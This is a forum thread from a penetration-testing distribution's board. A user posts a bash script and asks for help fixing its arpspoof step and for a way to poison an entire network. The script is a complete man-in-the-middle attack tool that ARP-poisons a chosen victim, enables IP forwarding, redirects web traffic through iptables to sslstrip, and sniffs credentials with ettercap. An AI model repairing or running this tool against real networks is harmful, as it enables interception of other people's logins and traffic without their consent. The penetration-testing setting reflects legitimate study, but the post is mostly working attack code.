SSl Sniff Script Repair

**ckcrown** · 05-11-2011, 04:53 AM

Found the following script. Have been unable to get it to run.
The error seems to be with the Arpspoof area.

Should I replace it with Ettercap, or well...what do you guys think?

Also, it is unclear how to ARP the entire network. I put in // // for target and the router IP for gateway. not sure if that would work being that the arp spoof fails.

I would appreciate any feedback.

Code:

#!/bin/bash
#
# Synopsis:	A program to sniff traffic in an SSL connection
# Author:		thims (thims DOT local AT gmail DOT com)
# Version:	0.3
# Date:			20091107
# Comments:	
#		ToDO:


# leave blank simply here for coding style
victim=
gateway=
sslPort=10000
etterConf=/etc/etter.conf

# print help
function help() {
cat << EOF
Usage: $0 [args] host
    -h, --help     -  Print this help and exit
    -i. --iface    -  Interface to use
    -e, --etconf   -  Location of etter.conf on the filesystem
    -v, --victim   -  IP address of desired host
    -g, --gateway  -  IP address of network gateway
    -s, --sslport  -  Desired port for sslstrip
EOF
}

# echo supplied argument and die
function die() {
	if [ -n "$1" ] ;then
		echo "$1"
	fi
	exit 1
}

# nohup wrapper to check if specified program will execute correctly
function noHup() {
	cmd="$1"
	nohup $cmd > /dev/null &> /dev/null &
	sleep 5
	# here simply to handle sslstrip because it is ran by python it throws off pidof
	if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
	else
		pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
	fi

	if [ -z "$pid" ] ;then
		return 1
	else
		return 0
	fi
}

# poison the arp
function spoofMac() {
	echo -n "Poisoning the victim...."
	noHup "arpspoof "$iface" -t "$victim" "$gateway""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate arpspoof. Dieing..."
	fi
	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
	echo "Ok"
}

# intercept the SSL cert
function sslInit() {
	echo -n "Setting up SSL intercept...."
	echo 1 > /proc/sys/net/ipv4/ip_forward
	# ensure that ip_forward is set
	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
	do
		echo 1 > /proc/sys/net/ipv4/ip_forward
	done

	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
	noHup "sslstrip -a -f -k -l "$sslPort""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate sslstrip. Dieing..."
	fi
	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
	echo "Ok"
}

# capture the responses
function capture() {
	# edit ettercap.conf
	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
	do
		sed -i $linNum's/#//' "$etterConf"
	done

	echo -n "Starting to sniff...."
	ettercap -T -q "$iface"
}

# clean up enviroment
function cleanUp() {
	echo "Cleaning up...."
	echo -n "Closing SSL proxy...."
	kill $(cat /var/run/sslsniff.sslstrip.run)
	rm /var/run/sslsniff.sslstrip.run
	echo "Ok"
	echo -n "Unpoisoning the victim...."
	kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
	rm /var/run/sslsniff.arpspoof.run
	echo "Ok"
	echo -n "Removing iptables rule and ip_forwarding...."
	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"	
	echo 0 > /proc/sys/net/ipv4/ip_forward
	echo "Ok"
	
	# return etter.conf to the state it was found in 
	echo -n "Returning etter.conf to the configuration we found it with...."
	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
	do
		sed -i $linNum's/^/#/' "$etterConf"
	done
	echo "Ok"
	echo "Have a nice day!"
}

# initialize the whole shebang
function initialize() {
  if [ -z "$victim" ] || [ -z "$gateway" ] ;then
    help
    echo
    die "Error: a syntactical one"
	else
		echo "Enviroment details:"
		echo "    Victim:         " "$victim" "  Ok!"
		echo "    Gateway/Router: " "$gateway" "  OK!"
		echo "    Interface:      " "$iface" "  OK!"
		echo "    SSLStrip port:  "	"$sslPort" "  OK!"

    spoofMac
    sslInit
    capture
		cleanUp
  fi  
}


# some CLI ARGS?
while [ $# -gt 0 ]
do
	case "$1" in
		"-h"|"--help")
			help
			die
		;;
		"-v"|"--victim")
			victim="$2"
		;;
		"-g"|"--gw")
			gateway="$2"
		;;
		"-s"|"--sslport")
			sslPort="$2"
		;;
		"-i"|"--iface")
			if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
				die "Error: interface "$2" does not exist!"
			else
				iface="-i $2"
			fi
		;;
		"-e"|"--etconf")
			if [ ! -e "$2" ] ;then
				die "Error: specified ettercap conf does not exist!"
			else
				etterConf="$2"
			fi
		;;
		'')
			help
			echo
			die "Error: a syntactical one"
		;;
		-*)
			help
			echo
			die "Error: a syntactical one"
		;;
	esac
	shift
done


# main loop
initialize

BackTrack Linux - Penetration Testing Distribution

Thread: SSl Sniff Script Repair

Thread Tools

Search Thread

Display

Threaded View

SSl Sniff Script Repair

Similar Threads

Ssl Sniff Script

Repair Dynamic Disks

Want to repair PCs in Texas? Get a PI License.

For anyone looking for IT work/experience or wanting cheaper repair!

Leo Repair is it possible?

Tags for this Thread

Posting Permissions